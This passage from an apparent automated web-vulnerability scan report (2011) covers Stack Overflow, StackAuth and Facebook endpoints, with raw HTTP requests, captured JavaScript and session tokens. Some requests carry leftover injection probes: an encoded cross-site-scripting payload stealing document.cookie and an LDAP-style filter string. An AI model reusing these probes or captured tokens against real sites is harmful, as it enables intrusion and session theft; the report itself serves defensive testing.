.)/g,"$1`");L=h(L,"\\`*_");return L});return I};var w=function(I){I=I.replace(/(\[((?:\[[^\]]*\]|[^\[\]])*)\][ ]?(?:\n[ ]*)?\[(.*?)\])()()()()/g,A);I=I.replace(/(\[((?:\[[^\]]*\]|[^\[\]])*)\]\([ \t]*()<?((?:\([^)]*\)|[^()])*?)>?[ \t]*((['"])(.*?)\6[ \t]*)?\))/g,A);I=I.replace(/(\[([^\[\]]+)\])()()()()()/g,A);return I};var A=function(S,R,V,K,M,Q,U,J){if(J==undefined){J=""}var L=R;var N=V;var O=K.toLowerCase();var P=M;var I=J;if(P==""){if(O==""){O=N.toLowerCase().replace(/ ?\n/g," ")}P="#"+O;if(f.get(O)!=undefined){P=f.get(O);if(F.get(O)!=undefined){I=F.get(O)}}else{if(L.search(/\(\s*\)$/m)>-1){P=""}else{return L}}}P=h(P,"*_");var T='<a href="'+P+'"';if(I!=""){I=I.replace(/"/g,"&quot;");I=h(I,"*_");T+=' title="'+I+'"'}T+=">"+N+"</a>";return T};var t=function(I){I=I.replace(/(!\[(.*?)\][ ]?(?:\n[ ]*)?\[(.*?)\])()()()()/g,s);I=I.replace(/(!\[(.*?)\]\s?\([ \t]*()<?(\S+?)>?[ \t]*((['"])(.*?)\6[ \t]*)?\))/g,s);return I};var s=function(R,Q,V,T,M,P,U,J){var L=Q;var K=V;var N=T.toLowerCase();var O=M;var I=J;if(!I){I=""}if(O==""){if(N==""){N=K.toLowerCase().replace(/ ?\n/g," ")}O="#"+N;if(f.get(N)!=undefined){O=f.get(N);if(F.get(N)!=undefined){I=F.get(N)}}else{return L}}K=K.replace(/"/g,"&quot;");O=h(O,"*_");var S='<img src="'+O+'" alt="'+K+'"';I=I.replace(/"/g,"&quot;");I=h(I,"*_");S+=' title="'+I+'"';S+=" />";return S};var D=function(I){I=I.replace(/^(.+)[ \t]*\n=+[ \t]*\n+/gm,function(J,K){return d("<h1>"+u(K)+"</h1>")});I=I.replace(/^(.+)[ \t]*\n-+[ \t]*\n+/gm,function(J,K){return d("<h2>"+u(K)+"</h2>")});I=I.replace(/^(\#{1,6})[ \t]*(.+?)[ \t]*\#*\n+/gm,function(J,K,M){var L=K.length;return d("<h"+L+">"+u(M)+"</h"+L+">")});return I};var G;var a=function(J){J+="~0";var I=/^(([ ]{0,3}([*+-]|\d+[.])[ \t]+)[^\r]+?(~0|\n{2,}(?=\S)(?![ \t]*(?:[*+-]|\d+[.])[ \t]+)))/gm;if(z){J=J.replace(I,function(K,L,M){var O=L;var N=(M.search(/[*+-]/g)>-1)?"ul":"ol";var P=G(O,N);P=P.replace(/\s+$/,"");P="<"+N+">"+P+"</"+N+">\n";return P})}else{I=/(\n\n|^\n?)(([ ]{0,3}([*+-]|\d+[.])[ 
\t]+)[^\r]+?(~0|\n{2,}(?=\S)(?![ \t]*(?:[*+-]|\d+[.])[ \t]+)))/g;J=J.replace(I,function(K,L,M,N){var P=L;var Q=M;var O=(N.search(/[*+-]/g)>-1)?"ul":"ol";var R=G(Q,O);R=P+"<"+O+">\n"+R+"</"+O+">\n";return R})}J=J.replace(/~0/,"");return J};var q={ol:"\\d+[.]",ul:"[*+-]"};G=function(M,L){z++;M=M.replace(/\n{2,}$/,"\n");M+="~0";var I=q[L];var J=new RegExp("(^[ \\t]*)("+I+")[ \\t]+([^\\r]+?(\\n+))(?=(~0|\\1("+I+")[ \\t]+))","gm");var K=false;M=M.replace(J,function(O,P,Q,R){var U=R;var T=P;var N=/\n\n$/.test(U);var S=N||U.search(/\n{2,}/)>-1;if(S||K){U=H(n(U),true)}else{U=a(n(U));U=U.replace(/\n$/,"");U=u(U)}K=N;return"<li>"+U+"</li>\n"});M=M.replace(/~0/g,"");z--;return M};var c=function(I){I+="~0";I=I.replace(/(?:\n\n|^)((?:(?:[ ]{4}|\t).*\n+)+)(\n*[ ]{0,3}[^ \t\n]|(?=~0))/g,function(K,L,N){var J=L;var M=N;J=v(n(J));J=r(J);J=J.replace(/^\n+/g,"");J=J.replace(/\n+$/g,"");J="<pre><code>"+J+"\n</code></pre>";return d(J)+M});I=I.replace(/~0/,"");return I};var d=function(I){I=I.replace(/(^\n+|\n+$)/g,"");return"\n\n~K"+(g.push(I)-1)+"K\n\n"};var B=function(I){I=I.replace(/(^|[^\\])(`+)([^\r]*?[^`])\2(?!`)/gm,function(J,K,L,M,N){var O=M;O=O.replace(/^([ \t]*)/g,"");O=O.replace(/[ \t]*$/g,"");O=v(O);return K+"<code>"+O+"</code>"});return I};var v=function(I){I=I.replace(/&/g,"&amp;");I=I.replace(/</g,"&lt;");I=I.replace(/>/g,"&gt;");I=h(I,"*_{}[]\\",false);return I};var j=function(I){I=I.replace(/([\W_]|^)(\*\*|__)(?=\S)([^\r]*?\S[\*_]*)\2([\W_]|$)/g,"$1<strong>$3</strong>$4");I=I.replace(/([\W_]|^)(\*|_)(?=\S)([^\r\*_]*?\S)\2([\W_]|$)/g,"$1<em>$3</em>$4");return I};var i=function(I){I=I.replace(/((^[ \t]*>[ \t]?.+\n(.+\n)*\n*)+)/gm,function(K,L){var J=L;J=J.replace(/^[ \t]*>[ \t]?/gm,"~0");J=J.replace(/~0/g,"");J=J.replace(/^[ \t]+$/gm,"");J=H(J);J=J.replace(/(^|\n)/g,"$1 ");J=J.replace(/(\s*<pre>[^\r]+?<\/pre>)/gm,function(M,N){var O=N;O=O.replace(/^ /mg,"~0");O=O.replace(/~0/g,"");return O});return d("<blockquote>\n"+J+"\n</blockquote>")});return I};var 
o=function(P,M){P=P.replace(/^\n+/g,"");P=P.replace(/\n+$/g,"");var O=P.split(/\n{2,}/g);var J=new Array();var I=O.length;for(var K=0;K<I;K++){var N=O[K];if(N.search(/~K(\d+)K/g)>=0){J.push(N)}else{if(N.search(/\S/)>=0){N=u(N);N=N.replace(/^([ \t]*)/g,"<p>");N+="</p>";J.push(N)}}}if(!M){I=J.length;for(var K=0;K<I;K++){while(J[K].search(/~K(\d+)K/)>=0){var L=g[RegExp.$1];L=L.replace(/\$/g,"$$$$");J[K]=J[K].replace(/~K\d+K/,L)}}}return J.join("\n\n")};var k=function(I){I=I.replace(/&(?!#?[xX]?(?:[0-9a-fA-F]+|\w+);)/g,"&amp;");I=I.replace(/<(?![a-z\/?\$!])/gi,"&lt;");return I};var x=function(I){I=I.replace(/\\(\\)/g,b);I=I.replace(/\\([`*_{}\[\]()>#+-.!])/g,b);return I};var C=function(I){I=I.replace(/(^|\s)(https?|ftp)(:\/\/[-A-Z0-9+&@#\/%?=~_|\[\]\(\)!:,\.;]*[-A-Z0-9+&@#\/%=~_|\[\]])($|\W)/gi,"$1<$2$3>$4");I=I.replace(/<((https?|ftp):[^'">\s]+)>/gi,'<a href="$1">$1</a>');return I};var E=function(I){I=I.replace(/~E(\d+)E/g,function(J,L){var K=parseInt(L);return String.fromCharCode(K)});return I};var n=function(I){I=I.replace(/^(\t|[ ]{1,4})/gm,"~0");I=I.replace(/~0/g,"");return I};var r=function(I){I=I.replace(/\t(?=\t)/g," ");I=I.replace(/\t/g,"~A~B");I=I.replace(/~B(.+?)~A/g,function(K,L,M){var N=L;var O=4-N.length%4;for(var J=0;J<O;J++){N+=" "}return N});I=I.replace(/~A/g," ");I=I.replace(/~B/g,"");return I};var h=function(M,K,J){var I="(["+K.replace(/([\[\]\\])/g,"\\$1")+"])";if(J){I="\\\\"+I}var L=new RegExp(I,"g");M=M.replace(L,b);return M};var b=function(I,J){var K=J.charCodeAt(0);return"~E"+K+"E"}};Attacklab.wmdBase=function(){Attacklab.wmd_env={version:1,output:"Markdown",lineLength:40,buttons:"bold italic link blockquote code image ol ul heading hr"};var k=top.Attacklab;var d=top.document;var j=top.RegExp;var b=top.navigator;k.Util={};k.Position={};k.Command={};k.Global={};var h=k.Util;var n=k.Position;var c=k.Command;var a=k.Global;a.isIE=/msie/.test(b.userAgent.toLowerCase());a.isIE_5or6=/msie 6/.test(b.userAgent.toLowerCase())||/msie 
5/.test(b.userAgent.toLowerCase());a.isOpera=/opera/.test(b.userAgent.toLowerCase());var o='<p><b>Insert Hyperlink</b></p><p>http://example.com/ "optional title"</p>';var g="<p><b>Insert Image</b></p><p>http://example.com/images/diagram.jpg \"optional title\"<br><br>Need <a href='http://www.google.com/search?q=free+image+hosting' target='_blank'>free image hosting?</a></p>";var e="http://";var i="http://";var l="../Img/";var f="/editing-help";var m="Markdown Editing Help";k.PanelCollection=function(){this.buttonBar=d.getElementById("wmd-button-bar");this.preview=d.getElementById("wmd-preview");this.output=d.getElementById("wmd-output");this.input=d.getElementById("wmd-input")};k.panels=undefined;k.ieCachedRange=null;k.ieRetardedClick=false;h.isVisible=function(p){if(window.getComputedStyle){return window.getComputedStyle(p,null).getPropertyValue("display")!=="none"}else{if(p.currentStyle){return p.currentStyle.display!=="none"}}};h.addEvent=function(r,q,p){if(r.attachEvent){r.attachEvent("on"+q,p)}else{r.addEventListener(q,p,false)}};h.removeEvent=function(r,q,p){if(r.detachEvent){r.detachEvent("on"+q,p)}else{r.removeEventListener(q,p,false)}};h.fixEolChars=function(p){p=p.replace(/\r\n/g,"\n");p=p.replace(/\r/g,"\n");return p};h.extendRegExp=function(r,t,q){if(t===null||t===undefined){t=""}if(q===null||q===undefined){q=""}var s=r.toString();var p;s=s.replace(/\/([gim]*)$/,"");p=j.$1;s=s.replace(/(^\/|\/$)/g,"");s=t+s+q;return new j(s,p)};h.createImage=function(q){var p=l+q;var r=d.createElement("img");r.className="wmd-button";r.src=p;return r};h.createBackground=function(){var p=d.createElement("div");p.className="wmd-prompt-background";style=p.style;style.position="absolute";style.top="0";style.zIndex="1000";if(a.isIE){style.filter="alpha(opacity=50)"}else{style.opacity="0.5"}var 
q=n.getPageSize();style.height=q[1]+"px";if(a.isIE){style.left=d.documentElement.scrollLeft;style.width=d.documentElement.clientWidth}else{style.left="0";style.width="100%"}d.body.appendChild(p);return p};h.uploadDialog=function(q){var s;var u;var r;var p=function(v){var w=(v.charCode||v.keyCode);if(w===27){t(null)}};s=$("<div style='top: 50%; left: 50%; display: block; padding: 10px; position: fixed; width:400px; z-index:1001' class='wmd-prompt-dialog'><div style='position: absolute; right: 20px; bottom: 5px; font-size: 10px;'>image hosting by <a title='imgur: the simple image sharer' href='http://imgur.com'>imgur.com</a></div><p><b>Insert an image</b></p><p style='padding-top: 10px;'><a href='#' class='wmd-mini-button selected' id='upload-image-button'>from my computer</a><a href='#' class='wmd-mini-button' id='upload-url-button'>from the web</a></p><iframe id='upload-iframe' style='display:none;' src='about:blank' name='upload-iframe'/><form action='/upload/image' method='post' enctype='multipart/form-data'><div style='position: relative' id='upload-file-input'> <input type='file' name='filename' id='filename-input' value='browse' style='border:0; font-size:18px; position:relative; text-align:right; -moz-opacity:0; filter:alpha(opacity: 0); opacity: 0; z-index: 2;'> <img src='http://i.imgur.com/GKc7H.png' height='15px' width='15px' style='position: absolute; left: 38px; top: 11px;'> <div style='position: absolute; top:0px; left:0px; z-index: 1;'> <input type='input' name='shadow-filename' value='' id='shadow-filename' style='width: 180px; margin-left:64px;'> <input type='button' name='choose-file' id='choose-file' value='Browse ...' 
style='width: 7em; margin-left: 5px;'> </div></div><div id='upload-url-input' style='display:none;'> <input type='input' name='upload-url' value='' style='width: 250px;'></div><p id='upload-message' style='padding-top: 4px; margin:0; line-height: 16px;'></p><div class='ac_loading' id='image-upload-progress' style='background-color: transparent; display:none;'>Uploading ...</div><input type='submit' value='Upload' style='width: 7em; margin: 10px;'><input type='button' value='Cancel' id='close-dialog-button' style='width: 7em; margin: 10px 10px 20px;'></form></div>");if(a.isIE_5or6){s[0].style.position="absolute";s[0].style.top=d.documentElement.scrollTop+200+"px";s[0].style.left="50%"}u=h.createBackground();var t=function(v){h.removeEvent(d.body,"keydown",p);s.remove();$(u).remove();q(v==undefined?null:v);return false};top.setTimeout(function(){$(d.body).append(s);$("#close-dialog-button").click(function(){t()});var z=$("#upload-image-button");var w=$("#upload-url-button");var v=$("#upload-url-input");var x=v.parent();var B=$("#upload-file-input");v.remove().show();var A=function(){$("#upload-message").text("click browse to choose an image from your computer")};A();z.click(function(){w.removeClass("selected");z.addClass("selected");A();v.remove();x.prepend(B);C();return false});w.click(function(){z.removeClass("selected");w.addClass("selected");$("#upload-message").text("paste the URL of your image above");x.prepend(v);B.remove();return false});var C=function(){$("#filename-input").click(function(){this.blur()});$("#filename-input").change(function(){$("#shadow-filename").val(this.value)})};C();var y=$("#upload-iframe")[0];s.find("form").submit(function(){$("#upload-message").hide();$("#image-upload-progress").show();this.target="upload-iframe";window.closeDialog=t;window.displayUploadError=function(D){$("#image-upload-progress").hide();$("#upload-message").show().text(D)};return 
true});s[0].style.marginTop=-(n.getHeight(s[0])/2)+"px";s[0].style.marginLeft=-(n.getWidth(s[0])/2)+"px";h.addEvent(d.body,"keydown",p)},0)};h.prompt=function(x,v,s){var u;var w;var t;if(v===undefined){v=""}var r=function(y){var z=(y.charCode||y.keyCode);if(z===27){p(true)}};var p=function(y){h.removeEvent(d.body,"keydown",r);var z=t.value;if(y){z=null}else{z=z.replace("http://http://","http://");z=z.replace("http://https://","https://");z=z.replace("http://ftp://","ftp://");if(z.indexOf("http://")===-1&&z.indexOf("ftp://")===-1&&z.indexOf("https://")===-1){z="http://"+z}}u.parentNode.removeChild(u);w.parentNode.removeChild(w);s(z);return false};var q=function(){u=d.createElement("div");u.className="wmd-prompt-dialog";u.style.padding="10px;";u.style.position="fixed";u.style.width="400px";u.style.zIndex="1001";var A=d.createElement("div");A.innerHTML=x;A.style.padding="5px";u.appendChild(A);var y=d.createElement("form");y.onsubmit=function(){return p(false)};style=y.style;style.padding="0";style.margin="0";style.cssFloat="left";style.width="100%";style.textAlign="center";style.position="relative";u.appendChild(y);t=d.createElement("input");t.type="text";t.value=v;style=t.style;style.display="block";style.width="80%";style.marginLeft=style.marginRight="auto";y.appendChild(t);var B=d.createElement("input");B.type="button";B.onclick=function(){return p(false)};B.value="OK";style=B.style;style.margin="10px";style.display="inline";style.width="7em";var z=d.createElement("input");z.type="button";z.onclick=function(){return 
p(true)};z.value="Cancel";style=z.style;style.margin="10px";style.display="inline";style.width="7em";y.appendChild(B);y.appendChild(z);h.addEvent(d.body,"keydown",r);u.style.top="50%";u.style.left="50%";u.style.display="block";if(a.isIE_5or6){u.style.position="absolute";u.style.top=d.documentElement.scrollTop+200+"px";u.style.left="50%"}d.body.appendChild(u);u.style.marginTop=-(n.getHeight(u)/2)+"px";u.style.marginLeft=-(n.getWidth(u)/2)+"px"};w=h.createBackground();top.setTimeout(function(){q();var z=v.length;if(t.selectionStart!==undefined){t.selectionStart=0;t.selectionEnd=z}else{if(t.createTextRange){var y=t.createTextRange();y.collapse(false);y.moveStart("character",-z);y.moveEnd("character",z);y.select()}}t.focus()},0)};n.getTop=function(q,r){var p=q.offsetTop;if(!r){while(q=q.offsetParent){p+=q.offsetTop}}return p};n.getHeight=function(p){return p.offsetHeight||p.scrollHeight};n.getWidth=function(p){return p.offsetWidth||p.scrollWidth};n.getPageSize=function(){var r,s;var t,p;if(self.innerHeight&&self.scrollMaxY){r=d.body.scrollWidth;s=self.innerHeight+self.scrollMaxY}else{if(d.body.scrollHeight>d.body.offsetHeight){r=d.body.scrollWidth;s=d.body.scrollHeight}else{r=d.body.offsetWidth;s=d.body.offsetHeight}}if(self.innerHeight){t=self.innerWidth;p=self.innerHeight}else{if(d.documentElement&&d.documentElement.clientHeight){t=d.documentElement.clientWidth;p=d.documentElement.clientHeight}else{if(d.body){t=d.body.clientWidth;p=d.body.clientHeight}}}var u=Math.max(r,t);var q=Math.max(s,p);return[u,q,t,p]};k.undoManager=function(s){var r=this;var v=[];var w=0;var p="none";var z;var x;var C;var A;var D=function(G,F){if(p!=G){p=G;if(!F){B()}}if(!a.isIE||p!="moving"){C=top.setTimeout(E,1)}else{A=null}};var E=function(){A=new k.TextareaState();C=undefined};this.setCommandMode=function(){p="command";B();C=top.setTimeout(E,0)};this.canUndo=function(){return w>1};this.canRedo=function(){if(v[w+1]){return true}return 
...[SNIP]...

19.5. http://sstatic.net/js/master.min.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://sstatic.net
Path:   /js/master.min.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /js/master.min.js?v=e8eb0725b4bd HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:01 GMT
Accept-Ranges: bytes
ETag: "64b5eb136fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:11:28 GMT
Content-Length: 57791

if(top!=self){top.location.replace(document.location);alert("For security reasons, framing is not allowed; click OK to remove the frames.")}$(function(){$.ajaxSetup({cache:false});master.bind_hidePopu
...[SNIP]...
</.test(ap)?"default-markup":"default-code"}return af[ao]}l(u,["default-code"]);l(A([],[[Y,/^[^<?]+/],[e,/^<!\w[^>]*(?:>|$)/],[j,/^<\!--[\s\S]*?(?:-\->|$)/],["lang-",/^<\?([\s\S]+?)(?:\?>|$)/],["lang-",/^<%([\s\S]+?)(?:%>|$)/],[an,/^(?:<[%?]|[%?]>
...[SNIP]...

20. Referer-dependent response
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.



20.1. http://stackauth.com/auth/global/read

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stackauth.com
Path:   /auth/global/read

Request 1

GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:17 GMT
Content-Length: 1199

<html><head>
<script type='text/javascript'>
var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY+Txasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA==","Nonce":"on9FTQAAAACIr5drBee4yA==","Referrer":"http://stackoverflow.com/","StorageName":"GlobalLogin"};

var obj = localStorage.getItem(data.StorageName);
if(obj != null) {
var req = new XMLHttpRequest();
req.open('POST', data.ReadSession+'?request='+encodeURIComponent(data.Request)+'&nonce='+encodeURIComponent(data.Nonce)+'&seriesAndToken='+encodeURIComponent(obj), false);
req.send(null);

if(req.status == 200){
top.postMessage(req.responseText, data.Referrer);
}else{
top.postMessage('No Session', data.Referrer);
}
}else{
top.postMessage('No Local Storage', data.Referrer);
}
</script>
</head><body></body></html>

Request 2

GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:12:34 GMT
Content-Length: 269



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Not Found
</title></head>
<body>
<h1>Not Found</h1>
</body>
</html>

20.2. http://stackoverflow.com/users/login/global/request

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stackoverflow.com
Path:   /users/login/global/request

Request 1

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:18 GMT
Content-Length: 135

{"token":"bEqbP8qpPMaMgpbj3SQniJpkt2/zUMQczGJvclBBnImHw7sB+kAuN2ERFOJROf2mS521rLttOVhYHlzNhYypqw==","nonce":"0n9FTQAAAACWxoj5YZ9Otw=="}

Request 2

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1
Content-Length: 0

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/plain
Date: Sun, 30 Jan 2011 15:12:27 GMT
Content-Length: 0


20.3. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:34:56 GMT
Content-Length: 7962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d44c040884fa9333092808" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u129656_1"><input title="Remove" type="button" id="u129656_1" /></label></div></td><td><div class="summary_text">6K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">6K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"97644637",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:337553,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"FwYsq",lhsh:"0807f",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yc\/r\/JJt3yB2LDLj.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yF\/r\/ezx-gKmDx-P.css"},"wDcHm":{"type":"css"
...[SNIP]...

Request 2

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:36:14 GMT
Content-Length: 7890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
